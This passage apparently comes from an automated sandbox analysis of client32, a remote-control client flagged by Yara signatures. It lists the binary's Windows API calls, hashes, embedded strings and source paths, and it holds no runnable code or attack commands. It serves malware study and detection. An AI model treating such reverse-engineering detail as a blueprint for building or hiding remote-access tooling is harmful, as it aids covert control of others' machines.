                                                                              • DispatchMessageA.USER32(?), ref: 110675F6
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchEvent
                                                                              • String ID:
                                                                              • API String ID: 4257095537-0
                                                                              • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                              • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                              • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                              • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                              APIs
                                                                              • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                              • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                              • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomDeleteGlobal$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 964255742-0
                                                                              • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                              • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                              • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                              • SetFocus.USER32(?), ref: 11007403
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                              • String ID: edit
                                                                              • API String ID: 1305092643-2167791130
                                                                              • Opcode ID: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
                                                                              • Opcode Fuzzy Hash: 08210b6cc54d90016c50a1c773d08534ce649efc3e71ddb39b7928ec6fe8f9a3
                                                                              • Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 110092E5
                                                                              • _memmove.LIBCMT ref: 11009336
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                              • String ID: string too long
                                                                              • API String ID: 2168136238-2556327735
                                                                              • Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
                                                                              • Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
                                                                              • Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                              • String ID: string too long
                                                                              • API String ID: 256744135-2556327735
                                                                              • Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
                                                                              • Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
                                                                              • Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1
                                                                              APIs
                                                                              • _calloc.LIBCMT ref: 1103B162
                                                                              • _free.LIBCMT ref: 1103B25B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
                                                                              • String ID: CLTCONN.CPP
                                                                              • API String ID: 183652615-2872349640
                                                                              • Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
                                                                              • Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
                                                                              • Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1108F7BC
                                                                              • __CxxThrowException@8.LIBCMT ref: 1108F7D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                              • String ID: L
                                                                              • API String ID: 1338273076-2909332022
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110AD1E3
                                                                                • Part of subcall function 110ACEB0: LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110AD1F3,00000000,00000001,00000000,?,11185738,000000FF,?,110ADC42,?,?,00000200,?), ref: 110ACEC4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110ACEE1
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110ACEEE
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110ACEFC
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110ACF0A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110ACF18
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardCancel), ref: 110ACF26
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110ACF34
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110ACF42
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110ACF50
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110ACF5E
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardControl), ref: 110ACF6C
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110ACF7A
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110ACF88
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110ACF96
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110ACFA4
                                                                                • Part of subcall function 110ACEB0: GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110ACFB2
                                                                              • FreeLibrary.KERNEL32(00000000,?,110ADC42,?,?,00000200,?,?,00000400,?,110F4A31,00000000,00000000,?,?,?), ref: 110AD252
                                                                              Strings
                                                                              • winscard.dll is NOT valid!!!, xrefs: 110AD1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad_memset
                                                                              • String ID: winscard.dll is NOT valid!!!
                                                                              • API String ID: 212038770-1939809930
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                              • String ID: string too long
                                                                              • API String ID: 963545896-2556327735
                                                                              APIs
                                                                              • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
                                                                              • SetDlgItemTextA.USER32(?,?,?), ref: 1102335F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText
                                                                              • String ID: ...
                                                                              • API String ID: 3367045223-440645147
                                                                              APIs
                                                                              • ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
                                                                                • Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
                                                                                • Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33
                                                                              • MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3
                                                                              Strings
                                                                              • j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$Window$InfoMoveParametersShow
                                                                              • String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
                                                                              • API String ID: 2940908497-693965840
                                                                              APIs
                                                                              • ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandFileModuleNameStrings
                                                                              • String ID: :
                                                                              • API String ID: 2034136378-336475711
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 11043784
                                                                              • GetClassNameA.USER32(?,?,00000040), ref: 11043799
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassNameProcessThreadWindow
                                                                              • String ID: tooltips_class32
                                                                              • API String ID: 2910564809-1918224756
                                                                              • Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                              • Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
                                                                              • Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
                                                                              • Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 110CB9E0: GetDlgItemTextA.USER32(?,?,?,00000400), ref: 110CBA0C
                                                                                • Part of subcall function 110CB9E0: SetDlgItemTextA.USER32(?,?,00000000), ref: 110CBA30
                                                                              • SetDlgItemTextA.USER32(?,000004BC,?), ref: 11039202
                                                                              • _memset.LIBCMT ref: 11039216
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ItemText$Window$ObjectRectShow_memset
                                                                              • String ID: 134349
                                                                              • API String ID: 3037201586-623835197
                                                                              • Opcode ID: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction ID: 4133adfa845279c2267cfda8ab6a139ff56e83a68c49f32f67e71b8829282469
                                                                              • Opcode Fuzzy Hash: 2bc1dfb5218c02c431ab83e71b2dcb76f085101561c9e5be1cea2ac4dddf3c12
                                                                              • Instruction Fuzzy Hash: E5119675740614AFE720DB68CC81FDAB7E8EF48704F004588F6089B280DBB1FA41CB95
                                                                              APIs
                                                                              • RegQueryValueExA.ADVAPI32(00020019,?,00000000,EE49F673,00000000,00020019,?,00000000), ref: 110ED600
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValuewvsprintf
                                                                              • String ID: ($Error %d getting %s
                                                                              • API String ID: 141982866-3697087921
                                                                              • Opcode ID: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                              • Instruction ID: 957b37bb43794c395efd3ecf64b5ca03ad7d4ce898e6801f907036c689cda8f8
                                                                              • Opcode Fuzzy Hash: ca51b0748ce67095b74e5d633593de675965d03fe984162ec59bedaca66226cf
                                                                              • Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1
                                                                              APIs
                                                                              Strings
                                                                              • Error Code Sent to Tutor is %d, xrefs: 1110B575
                                                                              • Error code %d not sent to Tutor, xrefs: 1110B5E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
                                                                              • API String ID: 2102423945-1777407139
                                                                              • Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
                                                                              • Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
                                                                              • Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5
                                                                              Strings
                                                                              • Error. NULL capbuf, xrefs: 1100B6A1
                                                                              • Error. preventing capbuf overflow, xrefs: 1100B6C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Error. NULL capbuf$Error. preventing capbuf overflow
                                                                              • API String ID: 0-3856134272
                                                                              • Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                              • Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
                                                                              • Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
                                                                              • Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000001,WTSSendMessageA), ref: 1112D6F4
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSSendMessageA
                                                                              • API String ID: 199729137-1676301106
                                                                              • Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                              • Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
                                                                              • Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
                                                                              • Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              • Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
                                                                              • Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
                                                                              • Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 11015049
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              APIs
                                                                              • wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                              • API String ID: 175691280-2052047905
                                                                              APIs
                                                                              • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                              • API String ID: 1134434899-3115850912
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hWnd, xrefs: 110151F9
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: QueueUserWorkItem
                                                                              • API String ID: 199729137-2469634949
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread__wcstoi64
                                                                              • String ID: *TapiFixPeriod$Bridge
                                                                              • API String ID: 1152747075-2058455932
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                              • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: FlashWindowEx
                                                                              • API String ID: 199729137-2859592226
                                                                              APIs
                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                              • m_hWnd, xrefs: 110010A6
                                                                              Memory Dump Source
